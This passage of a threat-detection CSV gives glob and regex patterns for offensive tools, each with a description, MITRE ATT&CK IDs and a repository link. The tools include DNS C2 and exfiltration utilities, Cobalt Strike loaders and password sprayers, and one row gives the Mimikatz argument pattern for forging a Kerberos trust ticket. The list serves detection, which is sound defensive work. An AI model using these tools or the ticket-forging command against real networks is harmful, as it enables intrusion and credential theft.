will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","10","10","104","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z" "*/dnscat2.git*",".{0,1000}\/dnscat2\.git.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*/dns-check-zone.nse*",".{0,1000}\/dns\-check\-zone\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dnschef.exe*",".{0,1000}\/dnschef\.exe.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*/dnschef.ini*",".{0,1000}\/dnschef\.ini.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*/dnschef.log*",".{0,1000}\/dnschef\.log.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*/dnschef.py*",".{0,1000}\/dnschef\.py.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*/dnschef-ng.git*",".{0,1000}\/dnschef\-ng\.git.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*/dnschef-ng/*",".{0,1000}\/dnschef\-ng\/.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*/dns-client-subnet-scan.nse*",".{0,1000}\/dns\-client\-subnet\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dnscnc.py*",".{0,1000}\/dnscnc\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/dnscrypt-proxy*",".{0,1000}\/dnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*/dnscrypt-proxy.git*",".{0,1000}\/dnscrypt\-proxy\.git.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*/dnsdump.py*",".{0,1000}\/dnsdump\.py.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","1","N/A","N/A","9","849","104","2023-12-13T15:56:51Z","2019-04-24T17:18:46Z" "*/DNSExfiltrator*",".{0,1000}\/DNSExfiltrator.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","9","827","180","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z" "*/dns-fuzz.nse*",".{0,1000}\/dns\-fuzz\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-ip6-arpa-scan.nse*",".{0,1000}\/dns\-ip6\-arpa\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-nsec3-enum.nse*",".{0,1000}\/dns\-nsec3\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-nsec-enum.nse*",".{0,1000}\/dns\-nsec\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-nsid.nse*",".{0,1000}\/dns\-nsid\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/DNS-Persist/*",".{0,1000}\/DNS\-Persist\/.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*/dns-random-srcport.nse*",".{0,1000}\/dns\-random\-srcport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-random-txid.nse*",".{0,1000}\/dns\-random\-txid\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dnsrecon.py*",".{0,1000}\/dnsrecon\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/dnsrecon-subdomain-bruteforce.py*",".{0,1000}\/dnsrecon\-subdomain\-bruteforce\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/dns-recursion.nse*",".{0,1000}\/dns\-recursion\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-service-discovery.nse*",".{0,1000}\/dns\-service\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dnsspoof.c*",".{0,1000}\/dnsspoof\.c.{0,1000}","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","178","45","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z" "*/dns-srv-enum.nse*",".{0,1000}\/dns\-srv\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/DNSStager.git*",".{0,1000}\/DNSStager\.git.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","1","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*/dnsstager.py*",".{0,1000}\/dnsstager\.py.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","1","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*/dnsteal*",".{0,1000}\/dnsteal.{0,1000}","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","N/A","10","1664","230","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z" "*/dnstool.py*",".{0,1000}\/dnstool\.py.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "*/dns-update.nse*",".{0,1000}\/dns\-update\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-zeustracker.nse*",".{0,1000}\/dns\-zeustracker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-zone-transfer.nse*",".{0,1000}\/dns\-zone\-transfer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-zone-transfer.py*",".{0,1000}\/dns\-zone\-transfer\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/dobin/avred*",".{0,1000}\/dobin\/avred.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*/docker-version.nse*",".{0,1000}\/docker\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/DocPlz.git*",".{0,1000}\/DocPlz\.git.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*/DocsPLZ.cpp*",".{0,1000}\/DocsPLZ\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*/DocsPLZ.exe*",".{0,1000}\/DocsPLZ\.exe.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*/documentation-c2/*",".{0,1000}\/documentation\-c2\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/documentation-payload/*",".{0,1000}\/documentation\-payload\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Doge-Loader/*",".{0,1000}\/Doge\-Loader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","279","59","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" "*/DoHC2.cs*",".{0,1000}\/DoHC2\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*/DoHC2.git*",".{0,1000}\/DoHC2\.git.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*/DoHC2/*",".{0,1000}\/DoHC2\/.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*/domain:* /sid:* /sids:* /rc4:* /user:* /service:krbtgt /target:*.kirbi*",".{0,1000}\/domain\:.{0,1000}\s\/sid\:.{0,1000}\s\/sids\:.{0,1000}\s\/rc4\:.{0,1000}\s\/user\:.{0,1000}\s\/service\:krbtgt\s\/target\:.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz Using domain trust key From the DC dump the hash of the currentdomain\targetdomain$ trust account using Mimikatz (e.g. with LSADump or DCSync). Then using this trust key and the domain SIDs. forge an inter-realm TGT using Mimikatz adding the SID for the target domains enterprise admins group to our SID history.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/domain_analyzer.git*",".{0,1000}\/domain_analyzer\.git.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1835","245","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "*/domain_analyzer:latest*",".{0,1000}\/domain_analyzer\:latest.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","0","N/A","6","10","1835","245","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "*/domainhunter*",".{0,1000}\/domainhunter.{0,1000}","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","1","N/A","N/A","10","1466","285","2023-11-23T05:38:05Z","2017-03-01T11:16:26Z" "*/DomainPasswordSpray.git*",".{0,1000}\/DomainPasswordSpray\.git.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*/DomainRecon/*.txt*",".{0,1000}\/DomainRecon\/.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/domcachedump.py*",".{0,1000}\/domcachedump\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/domcon-brute.nse*",".{0,1000}\/domcon\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/domcon-cmd.nse*",".{0,1000}\/domcon\-cmd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - 